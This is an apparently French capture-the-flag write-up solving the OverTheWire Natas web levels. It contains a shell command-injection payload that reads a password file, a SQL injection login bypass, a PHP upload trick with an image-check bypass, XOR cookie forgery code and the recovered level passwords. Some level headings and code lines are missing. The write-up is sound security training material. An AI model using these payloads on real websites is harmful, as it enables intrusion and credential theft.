You can find the password for the next level on this page.
===== Level 1 =====
>You can find the password for the next level on this page, but rightclicking has been blocked!
Le clic droit a été désactivé sur la page avec du javascript plusieurs solutions s'offrent à nous :
* Désactiver le javascript ( Sous chrome Ctrl + Shift + J et ensuite modifier les paramètres en cliquant sur l'engrenage en bas à droite)
* Modifier l'url pour accéder directement au code source : view-source:http://natas0.natas.labs.overthewire.org/
You can find the password for the
next level on this page, but rightclicking has been blocked!
===== Level 2 =====
>There is nothing on this page
On jette un petit coup d'oeil au code source :
There is nothing on this page
Tient un répertoire "files" allons voir ce qu'il contient :
Le répertoire contient deux fichier :
* pixel.png
* user.txt
Le fichier user.txt contient le mot de passe pour le niveau suivant.
There is nothing on this page
Tient même google ne pourrait pas trouver le mot de passe, cela fait tout de suite penser au fichier "robots.txt" qui permet d'indiquer au bots des moteurs de recherches quelles pages ne doivent pas être indexées.
Contenu du fichier "robots.txt" :
On a de la chance le code source est accessible, voici le code php qui permet de vérifier la clé :
include "includes/secret.inc";
if(array_key_exists("submit", $_POST)) {
if($secret == $_POST['secret']) {
print "Access granted. The password for natas7 is ";
} else {
print "Wrong secret";
}
}
?>
La clé est stockée dans une variable $secret probablement initialisé dans le fichier secret.inc qui se situe dans le dossier includes :
$secret = "FOEIUWGHFEEUHOFUOIU";
?>
On rentre la clé dans le formulaire et hop direction le prochain niveau :
>Access granted. The password for natas7 is XLoIufz83MjpTrtPvP9iAtgF48EWjicU
===== Level 7 =====
On se retrouve avec un deux liens vers des pages différentes :
Les pages sont inclue dynamiquement via un paramètre page en GET. Essayons avec page=test :
===== Level 8 =====
Même chose que pour le level 6 on doit trouver une clé et le code source est accessible :
$encodedSecret = "3d3d516343746d4d6d6c315669563362";
function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
}
if(array_key_exists("submit", $_POST)) {
if(encodeSecret($_POST['secret']) == $encodedSecret) {
print "Access granted. The password for natas9 is ";
} else {
print "Wrong secret";
}
}
?>
Pour trouver la clé il faut effectuer la fonction inverse de "encodeSecret" sur la clé contenu dans le variable $encodeSecret c'est à dire dans l'ordre :
- Conversion de l'hexadécimal en binaire ce qui nous donne "==QcCtmMml1ViV3b" (j'utiliser pour cela Xlate)
- On inverse l'ordre des caractères en utilisant la fonction strrev ce qui nous donne "b3ViV1lmMmtCcQ=="
- On décode en base64 ce qui nous donne "oubWYf2kBq"
>Access granted. The password for natas9 is sQ6DKR8ICwqDMTd48lQlJfbF1q9B3edT
===== Level9 =====
On rentre des lettres dans un formulaire et il nous ressort une liste de mot contenant la chaine de caractère depuis un dictionnaire, voici le code source :
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
passthru("grep -i $key dictionary.txt");
}
?>
La fonction passthru() est simailaire à la fonction excec() et permet d'exécuter une commande, dans notre cas la commande grep avec l'option -i (qui permet d'ignorer la case) et en paramètre la clé que l'on fourni et le dictionnaire dans lequel on doit chercher.
L'idée va être de modifier la commande afin de faire afficher la clé du prochain niveau. En utilisant comme clé "xyz dictionary.txt; cat /etc/natas_webpass/natas10 #" on exécute deux commande et la clé vers le niveau suivant s'affiche :
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
if(preg_match('/[;|&]/',$key)) {
print "Input contains an illegal character!";
} else {
passthru("grep -i $key dictionary.txt");
}
}
?>
Cette fois ci on va aller chercher la clé directement là où elle est censé se trouver et non pas dans dictionary.txt pour cela on utilise le caractère "#' qui permet d'ignorer la fin de la commande :
a /etc/natas_webpass/natas11 #
Et la clé s'affiche \o/ :
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
function xor_encrypt($in) {
$key = '';
$text = $in;
$outText = '';
// Iterate through each character
for($i=0;$i
natas11
Cookies are protected with XOR encryption
if($data["showpassword"] == "yes") {
print "The password for natas12 is
";
}
?>
Que fait ce code ?
- Recherche d'un cookie encrypté nommé data comprenant deux informations showpassword et bgcolor
- S'il existe il charge la couleur stockée
- Sinon il prend une valeur par défaut
- S'il y a modification ou pas il stocke la valeur du cookie
L'objectif étant de modifier la valeur du cookie afin que show password devienne égale à Yes, problème la cookie est encrypté. Il va donc falloir d'abord trouvé la clé qui permet de crypter le cookie.
Si on jette un oeil à la fonction qui permet de crypter le cookie on s'aperçoit que la fonction n'effectue qu'un simple XOR. Pour retrouver la clé d'origine j'ai donc légèrement modifié la fonction de cryptage afin de retomber sur la clé.
function antixor($in) {
$key = '{"showpassword":"no","bgcolor":"#ffffff"}';
$text = $in;
$outText = '';
// Iterate through each character
for($i=0;$i
En effet on sait que A ^ B = C donne C ^ A = B. Il suffit alors de faire un echo de la fonction antixor sur un cookie dont on connait la contenue.
echo antixor(base64_decode("ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw"));
On trouve alors que la clé est "qw8J" car le motif se répète. Une fois qu'on a la clé il suffit de la remplacer dans la fonction xor_encrypt et de l'utiliser sur un cookie dont on aura au préalable modifier la valeur du showpassword.
$yes = array( "showpassword"=>"yes", "bgcolor"=>"#ffffff");
echo "".base64_encode(xor_encrypt(json_encode($defaultdata)))."
";
Ce qui nous donne :
ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
On modifie donc la valeur du cookie, on recharge la page et c'est dans la poche :
>The password for natas12 is sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu
===== Level 12 =====
Code source du level 12 :
function genRandomString() {
$length = 10;
$characters = "0123456789abcdefghijklmnopqrstuvwxyz";
$string = "";
for ($p = 0; $p < $length; $p++) {
$string .= $characters[mt_rand(0, strlen($characters)-1)];
}
return $string;
}
function makeRandomPath($dir, $ext) {
do {
$path = $dir."/".genRandomString().".".$ext;
} while(file_exists($path));
return $path;
}
function makeRandomPathFromFilename($dir, $fn) {
$ext = pathinfo($fn, PATHINFO_EXTENSION);
return makeRandomPath($dir, $ext);
}
if(array_key_exists("filename", $_POST)) {
$target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);
if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
echo "File is too big";
} else {
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file $target_path has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
} else {
?>
} ?>
On se retrouve devant un formulaire d'uploader une image au format JPEG. Le nom du fichier est randomisé grâce à la fonction genRandomString cependant l'extension est écrite en dure dans le formulaire.
On va donc créer un petit fichier php permettant d'afficher la clé vers le prochain niveau :
On modifie l'extension en éditant le code source de la page et on upload le fichier.
>The file upload/cprocjo1uj.php has been uploaded
Le fichier est bien uplaodé avec l'extension php il ne reste plus qu'a naviguer à l'adresse du fichier pour voir apparaître la clé :
IGCXqS4x472aoHZYaidvmeoWj2GmuRYz
===== Level 13 =====
Le niveau 13 est le même que le niveau 12 à un détail près, un test est fait pour vérifier que le fichier uploadé est bien une image.
if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
echo "File is not an image";
}
Pour contourner cette protection j'ai créé une image d'1 pixel et j'ai collé à la suite mon script php. Le fichier est uploadé correctement et lorsque l'on charge l'image on se retrouve avec ceci :
‰PNG IHDRwSÞsRGB®ÎégAMA±üa pHYsÃÃÇo¨dIDATWcø¹i`ö–ºOIEND®B`‚ sSkCeug1bdrYejzAaBhgwI3qJXDKqlgh
La clé étant : sSkCeug1bdrYejzAaBhgwI3qJXDKqlgh
===== Level 14 =====
Code source du level 14 :
if(array_key_exists("username", $_REQUEST)) {
$link = mysql_connect('localhost', 'natas14', '');
mysql_select_db('natas14', $link);
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query
";
}
if(mysql_num_rows(mysql_query($query, $link)) > 0) {
echo "Successful login! The password for natas15 is
";
} else {
echo "Access denied!
";
}
mysql_close($link);
} else {
?>
On se retrouve devant un code vulnérable au injection SQL car les paramètres Username et Password ne sont pas du tout filtrés.
Si on utiliser pour username a et comme password : a" or "a"="a :
>http://natas14.natas.labs.overthewire.org/?debug&username=a&password=a" or "a"="a
Le requête sera toujours vrai et donc elle retournera l'ensemble des comptes.
>Executing query: SELECT * from users where username="a" and password="a" or "a"="a"
>Successful login! The password for natas15 is m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV
===== Level 15 =====
La solution sur [[http://www.techbrunch.fr/securite/wargame-natas-writeup-level-15/]]
===== Level 16 =====
===== Level 17 =====